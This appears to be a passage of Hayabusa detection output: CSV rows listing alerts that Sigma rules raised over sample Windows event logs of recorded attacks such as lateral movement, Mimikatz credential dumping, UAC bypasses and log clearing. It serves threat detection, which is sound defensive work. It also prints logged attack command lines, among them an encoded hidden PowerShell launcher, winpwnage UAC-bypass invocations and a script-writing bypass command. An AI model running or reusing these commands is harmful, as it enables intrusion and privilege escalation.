LC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe 